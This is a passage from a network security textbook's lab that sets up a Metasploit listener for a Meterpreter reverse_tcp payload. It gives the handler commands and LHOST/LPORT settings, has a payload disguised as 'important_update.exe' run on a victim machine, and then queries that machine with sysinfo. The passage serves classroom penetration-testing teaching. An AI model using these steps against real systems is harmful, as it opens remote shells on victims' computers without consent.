- Applied Network Security
- Arthur Salmon Warun Levesque Michael McLafferty
- 235字
- 2021-07-02 23:31:02
Starting the listener
First, we need to start our listener:
- Open Metasploit by typing msfconsole.
- Type use exploit/multi/handler.
- As stated before, we will be using meterpreter reverse_tcp payload. To set the payload, type the following:
set payload windows /meterpreter/reverse_tcp
This module doesn't have any settings that we can touch by default, so we need to add a payload. This tells the module what sort of reverse shell we're listening for; it'll help manage it for us:

- use exploit/multi/handler: handles the incoming connection
- set payload windows/meterpreter/reverse_tcp: reverses the TCP payload
- show options: shows the available options to set
- We also need to set up the LHOST and LPORT and make sure they're the same as the ones you set up in Step 3.
Then type Set lhost 192.168.10.50 Set lport 8080:
Set lhost 192.168.10.50 Set lport 8080

- Our handler is ready to receive the connection on port 8080.
- Type exploit to start the exploit.
Make sure that you transfer the important_update.exe file with the payload onto the victim computer the best way you can. Please contact your professor for assistance if needed.
Run the payload on the victim PC:

- Run the important-update on Server 2012:

- When you send the exploit to the victim, and the victim executes it, we get this:

- Type ? on the terminal to see the options available:

- Type sysinfo to make sure you can get information from the victim PC:

推薦閱讀
- Metasploit Penetration Testing Cookbook(Third Edition)
- 工業控制網絡安全技術
- 軟件開發安全之道:概念、設計與實施
- Kali Linux Network Scanning Cookbook(Second Edition)
- 網絡運維親歷記 (網絡運維紀實文學)
- 移動APT:威脅情報分析與數據防護
- 物聯網安全滲透測試技術
- 電腦安全與攻防入門很輕松(實戰超值版)
- 數據安全架構設計與實戰
- 信息技術基礎:提高篇·實驗與習題
- Cybersecurity Threats,Malware Trends,and Strategies
- Web代碼安全漏洞深度剖析
- 從實踐中學習Nmap滲透測試
- Metasploit 5.0 for Beginners
- INSTANT Microsoft Forefront UAG Mobile Configuration Starter